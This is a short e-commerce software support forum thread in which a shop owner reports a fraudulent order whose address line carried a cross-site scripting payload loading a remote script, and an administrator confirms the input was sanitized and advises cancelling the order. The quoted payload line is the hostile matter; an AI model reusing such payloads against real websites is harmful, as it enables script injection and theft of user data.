Kryptronic Software Support Forum

You are viewing this forum as a guest. Login to an existing account, or create a new account, to reply to topics and to create new topics.

#1 10-11-2017 07:38:42

sdn
Member
From: UK
Registered: 05-29-2007
Posts: 882

Possible XSS Attack on K902

We have received an order from a customer whose card address details are not a match. That in itself is not a great surprise but we had this additional data in the first line of their address.

24 Cyprus RD"><sCrIpT/sRc=//xss.tv/9u></sCrIpT>

Googling <sCrIpT/sRc=//xss.tv/9u></sCrIpT> I got a bunch of results some of which are about Cross-site Scripting (XSS).

The customer address is in Ohio, USA but the ip 36.4.133.82 is in China. Looks very suspect.

What do you make of it? Is K902 hardened against this sort of attack?

Not sure if it's related to the other post I made today concerning IP addresses for device authorisation emails. The order preceded the email by about 27 hours so it may be unrelated but no way of knowing.

Last edited by sdn (10-11-2017 08:06:45)


Simon

Offline

 

#2 10-11-2017 08:55:35

webmaster
Administrator
From: York, PA
Registered: 04-20-2001
Posts: 19861
Website

Re: Possible XSS Attack on K902

That looks like an attempted XSS attack.  As you can see the software properly accepted and sanitized everything and used the customer input as required.  K9 is hardened against this type of attack, as evidenced by what you're seeing right there - an XSS attempt with no XSS execution.  The order is definitely bogus, so cancel it.  I seriously doubt this is at all related to the device authorization issue reported in your other thread.  This was somebody testing your system for a vulnerability in an attempt to exploit it.  And they were unsuccessful, but likely have stolen card info from some poor soul in Ohio if you accept cards in realtime and their payment was processed.


Nick Hendler

Offline

 

#3 10-11-2017 09:15:18

sdn
Member
From: UK
Registered: 05-29-2007
Posts: 882

Re: Possible XSS Attack on K902

Thanks for the confirmation. The order and card authorisation have already been cancelled as even before seeing the XSS info which was truncated in the order email it looked suspect and the gmail address used bounced.

It is the poor online retailer who takes the hit if there is a chargeback, not the cardholder or the bank. If we get stung, we not only loose the value of the goods sent but to add insult to injury, our merchant services provider then charges us £50 for handling the chargeback. And they don't refund their card fees either. So we take all the risk and the bank wins whatever...

Last edited by sdn (10-12-2017 04:29:14)


Simon

Offline

 

Board footer